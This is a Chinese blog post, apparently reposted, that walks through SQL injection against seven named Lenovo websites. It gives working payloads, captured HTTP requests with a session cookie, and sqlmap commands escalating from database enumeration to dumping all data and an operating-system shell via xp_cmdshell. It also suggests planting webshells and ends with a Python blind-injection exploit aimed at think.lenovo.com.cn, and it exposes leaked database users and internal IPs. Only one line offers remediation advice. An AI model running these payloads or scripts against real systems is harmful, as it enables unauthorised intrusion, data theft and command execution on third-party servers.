标签:
建议:过滤/转义非法参数,屏蔽SQL查询错误。
工具:Firefox,hackbar,sqlmap,burpsuite
1、联想tms站
例1, 联想tms站fromCity参数存在普通SQL注入
提交,fromCity=6F9619FF-8A86-D011-B42D-00004FC964FF’ UNION SELECT user—
结果,数据库用户名信息泄露:swwl,而且,web物理路径也泄露,如图:
使用burpsuite获取正常请求包
POST /Common/AjaxWebService.asmx/CheckIsExistDefault HTTP/1.1
Host: tms.lenovomobile.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 94
fromCity=6F9619FF-8A86-D011-B42D-00004FC964FF&toCity=&CATID=&check=
将该数据包保存到:c:\test5.txt
此时,使用sqlmap验证该SQL注入
sqlmap.py -r c:\test5.txt -p fromCity //查询数据库、系统、中间件,脚本等信息
可以看到:
web server operating system: Windows 2008 R2 or 7 //系统:Windows 2008R2(一般)
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727 //脚本:aspx,ashx
back-end DBMS: Microsoft SQL Server 2008 //数据库:mssql
sqlmap.py -r c:\test5.txt --current-user //查询发生SQL注入的数据库的当前用户
看到了吗,当前用户就是:swwl
判断该当前用户是否是dba权限
sqlmap.py -r c:\test5.txt --is-dba
current user is DBA: False //说明不是dba权限
查看一下该数据库全部用户
sqlmap.py -r c:\test5.txt --privileges
看到了吗,该数据库共有两个用户:sa与swwl,而且,sa才具有dba权限。
此情此景,怎么获取dba权限,大家可以研究一下。
接下来,当然就是获取敏感数据了
sqlmap.py -r c:\test5.txt –dbs //查询出所有数据库
看到了吗,共8个有效数据库被查询出来了。
接下来,就是--dump-all了。
2、联想club站
例1,联想club站uid参数存在普通SQL注入
提交,uid=3042366 or 1=1
结果,敏感信息泄露,如图:
提交,uid=3042366 or left(database(),7)=’club_v2’
结果,敏感信息泄露,如图:
3、联想ask站
例1,联想ask站uid参数存在普通SQL注入
提交,uid=(select exp(~(select * from (select user())a)))
结果, 数据库用户及权限信息泄露,如图:
root@ask.lenovo.com.cn from dual
4、联想b2b站
例1, 联想b2b站id参数存在普通SQL注入
提交,id=1) UNION ALL SELECT CONCAT(user()),NULL,NULL,NULL,NULL,NULL—
结果,数据库用户信息泄露,如图:
think_b2b@202.85.219.248,不知道这个用户有没有dba权限
接下来的渗透,就跟tms站的思路一致了。
5、联想rel站
例1, 联想rel站TypeID参数存在普通SQL注入
提交,TypeID=8 and updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)#
结果,数据库用户名泄露,而且,内网IP也泄露,如图:
hzrelmysql@10.132.32.162,不知道这个用户有没有dba权限
提交,TypeID=8 and updatexml(1,concat(0x7e,(SELECT version()),0x7e),1)#
结果,数据库版本泄露,如图:
5.5.18.1-log
接下来的渗透,就跟tms站的思路一致了。
6、联想itsm站
例1, 联想itsm站ctl00$ContentSearch$TxtNextEmpName参数存在普通SQL注入
post提交:
POST /8.App/AppBillQry.aspx?Trn=A&DgIndex=2 HTTP/1.1
Host: 119.233.254.28
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://119.233.254.28/8.App/AppBillQry.aspx?Trn=A&DgIndex=2
Cookie: ASP.NET_SessionId=cjvsnmmmsmovnhpzy1132ddc
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 4816
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMjAwNzk4NzMyMw9kFgJmD2QWAgIDD2QWCgIBD2QWCgIBDw8WAh4EVGV4dAUn6IGU5oOz5omL5py65Lia5YqhLee7iOerr0hS566h55CG57O757ufZGQCAw8PFgIfAAUJ6JGj5b%2BX5YuHZGQCCQ8WAh4JaW5uZXJodG1sBQzljZXmja7lrqHmiblkAhEPZBYCAgEPFgIeBXN0eWxlBR9Db2xvcjpEYXJrUmVkO0ZvbnQtd2VpZ2h0OmJvbGQ7ZAITDxYCHgdWaXNpYmxlaGQCAw88KwALAQAPFhAeEXN0ck1vdXNlT3ZlckNvbG9yBQtMaWdodFllbGxvdx4LXyFJdGVtQ291bnQCBx4IRGF0YUtleXMWAB4JUGFnZUNvdW50AgEeDUVkaXRJdGVtSW5kZXgC%2F%2F%2F%2F%2Fw8eFV8hRGF0YVNvdXJjZUl0ZW1Db3VudAIHHglpUm93Q291bnQCBx4XQXV0b1VwZGF0ZUFmdGVyQ2FsbEJhY2tnZBYCZg9kFg4CAQ8PFgYeCUZvcmVDb2xvcgqkAR4JQmFja0NvbG9yCpwBHgRfIVNCAgwWBh4Lb25tb3VzZW92ZXIFUGN1cnJlbnRjb2xvcj10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcjt0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj0nTGlnaHRZZWxsb3cnHgpvbm1vdXNlb3V0BSd0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jdXJyZW50Y29sb3IfAgUsYmFja2dyb3VuZC1pbWFnZTp1cmwoLi4vaW1hZ2VzL21lbnVfYmcuZ2lmKTsWBGYPZBYCAgEPDxYCHwAFATFkZAICD2QWAgIBDw8WCB4LTmF2aWdhdGVVcmxlHwAFEOKWoCDljZXmja7nlLPor7ceCUZvbnRfQm9sZGcfDgKAEGRkAgIPD2QWBB8PBVBjdXJyZW50Y29sb3I9dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I7dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9J0xpZ2h0WWVsbG93Jx8QBSd0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jdXJyZW50Y29sb3IWBGYPZBYCAgEPDxYCHwAFATJkZAICD2QWAgIBDw8WBB8RBSUuLi84LkFwcC9BcHBOZXdSZXFMaXN0LmFzcHg%2FRGdJbmRleD0xHwAFCeaWsOeUs%2Bivt2RkAgMPD2QWBB8PBVBjdXJyZW50Y29sb3I9dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I7dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9J0xpZ2h0WWVsbG93Jx8QBSd0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jdXJyZW50Y29sb3IWBGYPZBYCAgEPDxYCHwAFATNkZAICD2QWAgIBDw8WCh8RBSguLi84LkFwcC9BcHBCaWxsUXJ5LmFzcHg%2FVHJuPUEmRGdJbmRleD0yHwAFFeW3sueUs%2Bivt%2BWNleaNruafpeivoh8SZx8MCjsfDgKEEGRkAgQPDxYGHwwKpAEfDQqcAR8OAgwWBh8PBVBjdXJyZW50Y29sb3I9dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I7dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9J0xpZ2h0WWVsbG93Jx8QBSd0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jdXJyZW50Y29sb3IfAgUsYmFja2dyb3VuZC1pbWFnZTp1cmwoLi4vaW1hZ2VzL21lbnVfYmcuZ2lmKTsWBGYPZBYCAgEPDxYCHwAFATRkZAICD2QWAgIBDw8WCB8RZR8ABRHilqAg5a6h5om5Juafpeivoh8SZx8OAoAQZGQCBQ8PZBYEHw8FUGN1cnJlbnRjb2xvcj10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcjt0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj0nTGlnaHRZZWxsb3cnHxAFJ3RoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPWN1cnJlbnRjb2xvchYEZg9kFgICAQ8PFgIfAAUBNWRkAgIPZBYCAgEPDxYEHxEFKC4uLzguQXBwL0FwcEJpbGxRcnkuYXNweD9Ucm49UCZEZ0luZGV4PTQfAAUN5a6h5om5JuafpeivomRkAgYPDxYCHwNoFgQfDwVQY3VycmVudGNvbG9yPXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yO3RoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPSdMaWdodFllbGxvdycfEAUndGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9Y3VycmVudGNvbG9yFgRmD2QWAgIBDw8WAh8ABQE2ZGQCAg9kFgICAQ8PFgQfEQUoLi4vOC5BcHAvQXBwQmlsbFFyeS5hc3B4P1Rybj1RJkRnSW5kZXg9NR8ABQ%2FlrqHmibnljZXmn6Xor6JkZAIHDw8WAh8DaBYEHw8FUGN1cnJlbnRjb2xvcj10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcjt0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj0nTGlnaHRZZWxsb3cnHxAFJ3RoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPWN1cnJlbnRjb2xvchYEZg9kFgICAQ8PFgIfAAUBN2RkAgIPZBYCAgEPDxYEHxEFKC4uLzguQXBwL0FwcEJpbGxRcnkuYXNweD9Ucm49TSZEZ0luZGV4PTYfAAUP5a6h5om55Y2V566h55CGZGQCBw8PFgIfAAUV5bey55Sz6K%2B35Y2V5o2u5p%2Bl6K%2BiZGQCCQ9kFgQCAQ8QDxYIHg1EYXRhVGV4dEZpZWxkBQtCYXNCaWxsTmFtZR4ORGF0YVZhbHVlRmllbGQFCUJhc0JpbGxJRB4LXyFEYXRhQm91bmRnHwtnZBAVAwAP6YCa55So5a6h5om55Y2VGOWRmOW3peWfuuiWquiwg%2BaVtOeUs%2BivtxUDAAEyATQUKwMDZ2dnFgFmZAIDDxAPFggfEwUIRGlzcE5hbWUfFAUIU3ViQ2xhc3MfFWcfC2dkEBUHAAbojYnnqL8J5b6F5a6h5om5D%2BWuoeaJueacqumAmui%2FhwzlrqHmibnlrozmiJAP566h55CG5ZGY5pKk5ZueDOeUqOaIt%2BaSpOWbnhUHAAEwATEBOAE5AUUBVxQrAwdnZ2dnZ2dnFgFmZAILD2QWAgIBDzwrAAsBAA8WEB8FZh8GFgAfBwIBHwgC%2F%2F%2F%2F%2Fw8fCWYfCmYfC2ceEEN1cnJlbnRQYWdlSW5kZXhmZBYCZg9kFgICAw9kFgJmD2QWAgIEDw8WCB8AZR4FV2lkdGgbAAAAAAAAPkABAAAAHgZIZWlnaHQbAAAAAAAAMkABAAAAHw4CgANkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUhY3RsMDAkQ29udGVudFNlYXJjaCRDYldpdGhBc2tEYXRlvLFsQJgxlR%2FCMbKdAdVa5UFo74arMZT%2Fw7ymYDkvWh0%3D&__EVENTVALIDATION=%2FwEdABxcvDxkgpH7c9m2bjtilBinVTQc%2B1IQ0yAquaCqQNGNf15wl3706%2FHYHJFSFSU%2FlRBlQWBnca%2Fe44mX9dJ2F27qwgIzZ3cYKKNp1lGZZqeaR0HvlDL6TJ3%2B5ekIGnuHyHY9CL68CCRonzsgCMj5fSfZWq0xbqjvVo9pONPnvJUwbH7n5ltL0IZdjVaeg3ux9tsaMmqAPvO1UpM2j82TI3sQN00qPdTFkhjProA1YcFQYqgz9YAqvLO60JA6OJZg%2B6xxzMEJSwj3k%2FHIfcegpfnsjpOtNFbkERvSEeHAhYABTHwViAIUPweGnoE%2F6qrZRTnVAtg0mUueFTWfTlyNfDYxIBcY4fyO38eURsUSbdbBJafVFWPduvw10pHT5wVk%2Bxu1drRTLbaLo2HJ08eNUqRoQni7uX8%2FGYl%2BaKHQzdZ8eJ8WcYn6ZAM9vRDOigbS92cd2Fu2aiv5mQAFdcyxJM2PMXBN8tqEt%2Fgy9UxwH9DVsj16j4C8slXvkdHWoIEXCIdZtQ2vq3Y1eiDfdIP41qlwjJUOhTAuWow6l9Dl4BYPP0KSAOyoj3kiyradPE7arZoYq0ugKENf63EQvBK8lYL0mny1TpBxZCsQLOVGjsL9nI3m3xfzRX8fk2vnmlpMglY%3D&ctl00%24ContentSearch%24DdlBasBillName=&ctl00%24ContentSearch%24DdlAppStatus=&ctl00%24ContentSearch%24CbWithAskDate=on&ctl00%24ContentSearch%24TxtDateFr=2015-12-11&ctl00%24ContentSearch%24TxtDateTo=2016-01-11&ctl00%24ContentSearch%24TxtRegName=111111111&ctl00%24ContentSearch%24TxtNextEmpName=&ctl00%24ContentSearch%24btnSearch=%B2%E9%D1%AF&ctl00%24ContentDetail%24GvDetail%24ctl04%24ctl03=
将该请求包保存到c:\test1.txt
直接上sqlmap,验证该SQL注入
sqlmap.py -r c:\test1.txt
看到了吧:
web server operating system: Windows 2008 R2 or 7 //Windows 2008R2
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5 //aspx,ashx脚本
back-end DBMS: Microsoft SQL Server 2008 //mssql数据库
接下来,查看当前用户是否具有dba权限
sqlmap.py -r c:\test1.txt --is-dba
current user is DBA: True //说明当前用户具有dba权限,好
dba权限:数据库管理员权限,如果存在xp_cmdshell的话,该权限可以执行系统命令
此时,我们就可以通过os-shell来执行系统命令了
提交:
sqlmap.py -r c:\test1.txt --os-shell //获取系统cmdshell
sqlmap回显如下:
[10:16:54] [INFO] testing if current user is DBA
[10:16:55] [INFO] testing if xp_cmdshell extended procedure is usable
[10:17:27] [INFO] going to use xp_cmdshell extended procedure for operating system command execution
[10:17:27] [INFO] calling Windows OS shell. To quit type ‘x‘ or ‘q‘ and press ENTER
到此,我们就获取到了系统cmdshell了
在os-shell>这个界面,你就可以执行cmd命令了
Ver
Dir
Net user
Netstat –ano
…
在os-shell>这个界面,你也可以通过某些方法来获取该站点的webshell,大家可以研究下
网上流传的sqlmap交互式写webshell,对于MySQL数据库+php还实用,经本人亲测,mssql数据库+aspx不适用,对于mssql数据库+aspx,建议使用os-shell>来写webshell,至于写webshell的方法,大家可以自行百度。
退出该cmdshell,直接x
do you want to remove UDF ‘master..new_xp_cmdshell‘? [Y/n]
Y
7、联想think站
例1, 联想think站doccatid参数存在普通SQL注入
提交,doccatid=(case when 1 like 1 then 1249014520765 end)
结果,将全部文章都查询出来了,如图:
可见,这里存在搜索型SQL注入
此时,使用Python编写一个EXP
import httplib
import time
import string
import sys
import random
import urllib
headers = {
‘Content-Type‘: ‘application/x-www-form-urlencoded‘,
‘Cookie‘: ‘‘,
‘User-Agent‘: ‘Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36‘,
}
payloads = list(string.ascii_lowercase)
payloads += list(string.ascii_uppercase)
for i in range(0,10):
payloads.append(str(i))
payloads += [‘@‘,‘_‘, ‘.‘, ‘-‘, ‘\\‘, ‘ ‘]
print ‘Try to retrive SQL User‘
user = ‘‘
for i in range(1,13):
for payload in payloads:
lens = 0
for j in range(1,3):
try:
conn = httplib.HTTPConnection(‘think.lenovo.com.cn‘, timeout=5)
start_time = time.time()
conn.request(‘GET‘,"/htmls/advancedsearch.aspx?doccatid=(case%20when%20user%20like%20CAST%280x"+user+"%s25" % payload.encode(‘hex‘)+"%20AS%20VARCHAR%284000%29%29then%201249014520765%20end)")
lens=conn.getresponse().length
conn.close()
break
except:
print ‘no‘
if lens >= 24000 and lens <= 25000: # 2 succ
user += payload.encode(‘hex‘)
sys.stdout.write( ‘\r[In Progress] ‘ + user.decode(‘hex‘) )
sys.stdout.flush()
break
print ‘\n[Done], SQL user is‘, user.decode(‘hex‘)
通过该exp,就可以查询出当前数据库的用户了
数据库用户:web_thinkcms
标签:
原文地址:http://www.cnblogs.com/windclouds/p/5413373.html
